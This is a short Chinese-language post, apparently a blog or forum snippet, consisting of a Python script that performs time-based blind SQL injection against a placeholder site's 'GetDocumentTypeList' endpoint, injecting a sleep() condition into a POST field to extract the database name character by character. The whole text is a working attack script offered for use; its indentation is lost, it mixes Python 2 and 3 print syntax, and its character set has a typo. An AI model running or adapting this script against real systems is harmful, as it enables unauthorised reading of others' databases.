随手写的,觉得太垃圾了不要打我
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'
user=''
print('Start to retrive current user:')
for i in range(1,23):
for payload in payloads:
startTime=time.time()
headers ={'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'}
url = """http://www.xxx.com/user/GetDocumentTypeList"""
data = {'businessType':"""if(substring(database(),{0},1)='{1}',sleep(2),1)""".format(i,payload)}
response=requests.post(url,headers=headers,data=data)
if time.time() - startTime > 2:
user +=payload
print 'user is:', user
break
print('
[Done] current user is {0}'.format(user))
效果
